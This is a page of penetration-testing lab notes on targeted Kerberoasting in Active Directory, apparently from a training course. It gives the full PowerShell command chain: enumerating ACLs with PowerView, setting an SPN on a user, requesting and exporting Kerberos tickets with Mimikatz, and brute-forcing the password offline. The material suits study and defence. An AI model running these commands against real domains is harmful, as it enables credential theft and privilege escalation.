Priv Esc - Targeted Kerberoasting - Set SPN

With enough rights (GenericAll/GenericWrite), a target user's SPN can be set to anything (unique in the domain).
We can then request a TGS without special privileges. The TGS can then be "Kerberoasted".

#Find which groups we belong to: We find RDPUsers
Import-Module powerview.ps1
Get-NetUser -UserName student529
givenname             : student529
memberof              : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local


#Find All Groups
Get-NetGroup


#Let's enumerate the permissions for RDPUsers on ACLs using PowerView (dev):
#To find where RDPUSERS have write permission to a user to edit
Import-Module powerview_dev.ps1
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}


#Using Powerview (dev), see if the user already has a SPN:
Import-Module powerview_dev.ps1
Get-DomainUser -Identity support10user | select serviceprincipalname


#If the user does not have a SPN, we can set it up below
#Set a SPN for the user (must be unique for the domain)
Import-Module powerview_dev.ps1
Set-DomainObject -Identity support10user -Set @{serviceprincipalname='ops/whatever1'}


#Request a ticket
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"


#from PowerView can be used as well for cracking with John or Hashcat.
Import-Module invoke-mimikatz.ps1
Request-SPNTicket ops/whatever1


#Check if the ticket has been granted
klist


#Export all tickets using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"'


#Brute-force the password
python.exe .\tgsrepcrack.py .\10k-passwords.txt '.\2-40a10000-student1@ops~whatever1-dollarcorp.moneycorp.LOCAL.kirbi'

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

ActiveDirectoryRights:GenericAll, means that we can edit the user Support20User. We can add a SPN and rquest a SPNTicket

PreviousPriv Esc – Unconstrained Delegation NextTargeted Kerberoasting - AS-REPs

Last updated 4 years ago

Was this helpful?

#Find which groups we belong to: We find RDPUsers Import-Module powerview.ps1 Get-NetUser -UserName student529 givenname : student529 memberof : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local #Find All Groups Get-NetGroup #Let's enumerate the permissions for RDPUsers on ACLs using PowerView (dev): #To find where RDPUSERS have write permission to a user to edit Import-Module powerview_dev.ps1 Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} #Using Powerview (dev), see if the user already has a SPN: Import-Module powerview_dev.ps1 Get-DomainUser -Identity support10user | select serviceprincipalname #If the user does not have a SPN, we can set it up below #Set a SPN for the user (must be unique for the domain) Import-Module powerview_dev.ps1 Set-DomainObject -Identity support10user -Set @{serviceprincipalname='ops/whatever1'} #Request a ticket Add-Type -AssemblyNAme System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1" #from PowerView can be used as well for cracking with John or Hashcat. Import-Module invoke-mimikatz.ps1 Request-SPNTicket ops/whatever1 #Check if the ticket has been granted klist #Export all tickets using Mimikatz Invoke-Mimikatz -Command '"kerberos::list /export"' #Brute-force the password python.exe .\tgsrepcrack.py .\10k-passwords.txt '.\2-40a10000-student1@ops~whatever1-dollarcorp.moneycorp.LOCAL.kirbi'